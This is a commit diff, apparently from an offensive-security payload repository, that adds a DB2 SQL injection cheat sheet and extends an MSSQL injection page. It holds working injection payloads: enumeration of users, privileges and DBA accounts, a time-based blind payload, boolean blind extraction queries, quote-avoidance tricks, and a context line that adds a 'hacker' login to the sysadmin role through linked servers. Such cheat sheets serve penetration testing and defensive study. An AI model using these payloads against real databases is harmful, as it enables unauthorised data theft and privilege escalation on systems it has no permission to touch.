DB2 Injection + ADCS

SQL Injection/DB2 Injection.md

@@ -0,0 +1,208 @@
+# DB2 Injection
+
+> 
+
+## Summary
+
+* [DB2 Cheatsheet](#db2-cheatsheet)
+* [References](#references) 
+
+## DB2 Cheatsheet
+
+### Version
+
+```sql
+select versionnumber, version_timestamp from sysibm.sysversions;
+select service_level from table(sysproc.env_get_inst_info()) as instanceinfo
+select getvariable('sysibm.version') from sysibm.sysdummy1 -- (v8+)
+select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo
+select service_level,bld_level from sysibmadm.env_inst_info
+```
+
+### Comments	
+
+```sql
+select blah from foo -- comment like this (double dash)
+```
+
+### Current User
+
+```sql
+select user from sysibm.sysdummy1
+select session_user from sysibm.sysdummy1
+select system_user from sysibm.sysdummy1
+```
+
+### List Users
+
+DB2 uses OS accounts
+
+```sql
+select distinct(authid) from sysibmadm.privileges -- priv required
+select grantee from syscat.dbauth -- incomplete results
+select distinct(definer) from syscat.schemata -- more accurate
+select distinct(grantee) from sysibm.systabauth -- same as previous
+```
+
+### List Privileges
+
+```sql
+select * from syscat.tabauth -- shows priv on tables
+select * from syscat.tabauth where grantee = current user -- shows privs for current user
+select * from syscat.dbauth where grantee = current user;;
+select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies
+```
+
+### List DBA Accounts	
+
+```sql
+select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'
+select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = ‘Y’ or SYSADMAUTH = ‘G’
+```
+
+### Current Database	
+
+```sql
+select current server from sysibm.sysdummy1
+```
+
+### List Databases
+
+```sql
+select distinct(table_catalog) from sysibm.tables
+SELECT schemaname FROM syscat.schemata;
+```
+
+### List Columns
+
+```sql
+select name, tbname, coltype from sysibm.syscolumns -- also valid syscat and sysstat
+```
+
+### List Tables
+
+```sql
+select table_name from sysibm.tables
+select name from sysibm.systables
+```
+
+### Find Tables From Column Name	
+
+```sql
+select tbname from sysibm.syscolumns where name='username'
+```
+
+### Select Nth Row
+
+```sql
+select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only
+```
+
+### Select Nth Char	
+
+```sql
+select substr('abc',2,1) FROM sysibm.sysdummy1 -- returns b
+```
+
+### Bitwise AND/OR/NOT/XOR
+
+```sql
+select bitand(1,0) from sysibm.sysdummy1 -- returns 0. Also available bitandnot, bitor, bitxor, bitnot
+```
+
+### ASCII Value
+
+```sql
+Char	select chr(65) from sysibm.sysdummy1 -- returns 'A'
+```
+
+### Char -> ASCII Value	
+
+```sql
+select ascii('A') from sysibm.sysdummy1 -- returns 65
+```
+
+### Casting
+
+```sql
+select cast('123' as integer) from sysibm.sysdummy1
+select cast(1 as char) from sysibm.sysdummy1
+```
+
+### String Concat
+
+```sql
+select 'a' concat 'b' concat 'c' from sysibm.sysdummy1 -- returns 'abc'
+select 'a' || 'b' from sysibm.sysdummy1 -- returns 'ab'
+```
+
+
+### IF Statement
+Seems only allowed in stored procedures. Use case logic instead.
+
+### Case Statement
+
+```sql
+select CASE WHEN (1=1) THEN 'AAAAAAAAAA' ELSE 'BBBBBBBBBB' END from sysibm.sysdummy1
+```
+
+
+### Avoiding Quotes
+
+```sql
+SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 -- returns “ADRI”. Works without select too
+```
+
+### Time Delay
+
+Heavy queries, for example: If user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response. 
+However, if user doesn't start with ascii 68, the heavy query won't execute and thus the response will be faster.
+```sql
+' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68 
+```
+
+### Serialize to XML (for error based)
+
+```sql
+select xmlagg(xmlrow(table_schema)) from sysibm.tables -- returns all in one xml-formatted string
+select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) -- Same but without repeated elements
+select xml2clob(xmelement(name t, table_schema)) from sysibm.tables -- returns all in one xml-formatted string (v8). May need CAST(xml2clob(… AS varchar(500)) to display the result.
+```
+
+### Command Execution and Local File Access
+
+Seems it's only allowed from procedures or UDFs.
+
+### Hostname/IP and OS INFO
+
+```sql
+select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info -- requires priv
+```
+
+### Location of DB Files
+
+```sql
+select * from sysibmadm.reg_variables where reg_var_name='DB2PATH' -- requires priv
+```
+
+### System Config
+
+```sql
+select dbpartitionnum, name, value from sysibmadm.dbcfg where name like 'auto_%' -- Requires priv. Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.
+select name, deferred_value, dbpartitionnum from sysibmadm.dbcfg -- Requires priv. Retrieve all the database configuration parameters values stored on disk for all database partitions.
+```
+
+### Default System Database
+
+* SYSIBM
+* SYSCAT
+* SYSSTAT
+* SYSPUBLIC
+* SYSIBMADM
+* SYSTOOLs
+
+
+## References
+
+* [DB2 SQL injection cheat sheet - Adrián - 20/05/2012](https://securityetalii.es/2012/05/20/db2-sql-injection-cheat-sheet/)
+* [DB2 SQL Injection Cheat Sheet - pentestmonkey](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)

SQL Injection/MSSQL Injection.md

@@ -2,9 +2,11 @@
 
 ## Summary
 
-* [MSSQL comments](#mssql-comments)
-* [MSSQL version](#mssql-version)
-* [MSSQL database name](#mssql-database-name)
+* [MSSQL Comments](#mssql-comments)
+* [MSSQL User](#mssql-user)
+* [MSSQL Version](#mssql-version)
+* [MSSQL Hostname](#mssql-hostname)
+* [MSSQL Database name](#mssql-database-name)
 * [MSSQL List databases](#mssql-list-databases)
 * [MSSQL List columns](#mssql-list-columns)
 * [MSSQL List tables](#mssql-list-tables)
@@ -22,7 +24,7 @@
 * [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
 * [MSSQL Trusted Links](#mssql-trusted-links)
 
-## MSSQL comments
+## MSSQL Comments
 
 ```sql
 -- comment goes here
@@ -33,6 +35,9 @@
 
 ```sql
 SELECT CURRENT_USER
+SELECT user_name();
+SELECT system_user;
+SELECT user;
 ```
 
 ## MSSQL version
@@ -41,7 +46,14 @@ SELECT CURRENT_USER
 SELECT @@version
 ```
 
-## MSSQL database name
+## MSSQL Hostname
+
+```sql
+SELECT HOST_NAME()
+SELECT @@hostname;
+```
+
+## MSSQL Database name
 
 ```sql
 SELECT DB_NAME()
@@ -122,6 +134,13 @@ For string inputs   : ' + cast((SELECT @@version) as int) + '
 ## MSSQL Blind based
 
 ```sql
+AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -
+
+AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
+AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64-- 
+
+AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
+
 SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
 
 WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
@@ -283,4 +302,5 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
 * [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
 * [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
 * [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT)
-* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)
+* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)
+* [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - 28 January 2009](https://www.exploit-db.com/papers/12975)